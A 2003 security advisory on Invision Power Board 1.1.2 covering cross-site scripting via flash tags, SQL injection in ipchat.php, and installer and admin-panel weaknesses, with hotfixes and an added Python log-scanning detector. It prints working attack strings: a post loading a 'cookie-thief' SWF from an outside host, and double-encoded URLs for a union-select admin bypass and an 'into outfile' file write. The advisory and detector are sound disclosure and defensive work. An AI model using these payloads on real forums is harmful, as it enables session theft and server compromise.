Invision Powerboard V.1.1.2 Multiple Vulnerabilities

[11.07.03] Invision Powerboard V.1.1.2 Multiple Vulnerabilities

 

===========================================

Security REPORT Invision Power Board v1.1.2

===========================================

 

Product: Power Board v1.1.2 (maybe earlier Versions)

Vulnerabilities: cross site scripting, sql-injection, install- and admin-issues, os-command execution

Vuln.-Classes: Check out www.owasp.org/asac/ for more detailed information on "Attack Components"

Vendor: www.invisionboard.com

Vendor-Status: contacted "info@invisionpower.com" on Jul.11th 2003

Vendor-Patches: www.invisionboard.com/downloads/chat.zip

 

Exploitable:

Local: ---

Remote: YES

 

============

Introduction

============

 

Visit "http://www.invisionboard.com/" for additional information.

 

=====================

Vulnerability Details

=====================

 

 

1) CROSS-SITE-SCRIPTING

=======================

 

OBJECT:

Post.php

 

DESCRIPTION:

By using [FLASH=h,w][/FLASH] tags within a posting (Post textarea) it is possible to execute arbitrary client-side scripts, thus leading to cookie theft.

 

The usage of flash tags is allowed by default in "conf_global.php":

---*---
$INFO['allow_flash'] = '1';
---*---

EXAMPLE-Content:
---*---
hey dude, whats up?
[FLASH=2,2]http:// anotherhost.ext/cookie-thief.swf[/FLASH]
cu,
jonnie
---*---

 

2) SQL-INJECTION

================

 

OBJECT:

ipchat.php

 

DESCRIPTION:

Depending on the MySQL version and/or drivers, it is possible to change the result of SQL queries.

 

 

EXAMPLE (MySQL > 4):

---*---

http:// localhost/ibo/ipchat.php?password=1 &username=9x%2527+union+select+ %25271%2527,%2527c4ca4238a0b923820dcc509a6f75849b%2527, %2527admin%2527,1%252f*+

---*---

 

EXAMPLE (with file-permission set):

---*---
http:// localhost/ibo/ipchat.php?password=1 &username=admin%2527into+outfile+%2527 [fullpath]%2527--+
---*---
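
A detection sketch for the two requests above, added here as an example and not part of the original advisory: it percent-decodes the ipchat.php parameters repeatedly and reports SQL metacharacters together with the number of decoding rounds needed to reveal them (%2527 -> %27 -> '). The access-log format, the sample lines and the function names are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# SQL metacharacters/keywords taken from the advisory's example requests.
SQL_META = re.compile(r"['\"]|--|/\*|\bunion\b|\binto\s+outfile\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format is an assumption).
SAMPLE_LOG = [
    '192.0.2.10 - - [11/Jul/2003:10:00:01 +0200] "GET /ibo/ipchat.php?password=secret&username=jonnie HTTP/1.0" 200 512',
    '192.0.2.77 - - [11/Jul/2003:10:00:09 +0200] "GET /ibo/ipchat.php?password=1&username=admin%2527--+ HTTP/1.0" 200 512',
    '192.0.2.10 - - [11/Jul/2003:10:00:12 +0200] "GET /ibo/index.php?act=Search&keywords=o%27reilly HTTP/1.0" 200 2048',
]

def decode_layers(value, max_rounds=3):
    """Percent-decode until the value stops changing; return (value, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def scan_line(line, script="ipchat.php"):
    """Return [(param, rounds, decoded)] for suspicious parameters in one log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/" + script):
        return []          # only the script named in the advisory is inspected
    findings = []
    for pair in url.query.split("&"):
        name, _, raw = pair.partition("=")
        # Work on the raw value so every encoding layer is counted.
        decoded, rounds = decode_layers(raw.replace("+", " "))
        if SQL_META.search(decoded):
            findings.append((name, rounds, decoded))
    return findings

if __name__ == "__main__":
    for n, line in enumerate(SAMPLE_LOG, 1):
        for name, rounds, decoded in scan_line(line):
            print(f"line {n}: {name} needs {rounds} decode round(s): {decoded!r}")
```

A finding with two or more rounds marks a value whose quote only appears after a second decode, as with %2527 in the requests above.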

 

3) INSTALLER-, ADMIN-ISSUES

===========================

 

If for some reason (permissions, directory moving) the installer lockfile (install.lock) is missing, any user can use the "sm_install.php" script.

 

Once administrator, one is able to:

 

A) execute arbitrary SQL queries through "admin.php/act=mysql/code=runsql/query=sq"

B) upload arbitrary files (including programs and scripts) into the "emoticons" directory.

 

... thus leading to a "total" compromise of the http-server's account.

 

 

=======

Remarks

=======

 

---

 

====================

Recommended Hotfixes

====================

 

disallow flash in "conf_global.php".

check for installer-lockfile.

 

software patch(es).

 

 

EOF Martin Eiszner / @2003WebSec.org

 

 

=======

Contact

=======

 

SEC Consult Unternehmensberatung GmbH / Martin Eiszner

Blindengasse 3

1080 Vienna

 

Austria / EUROPE

 

m dot eiszner at sec-consult dot com

www.sec-consult.com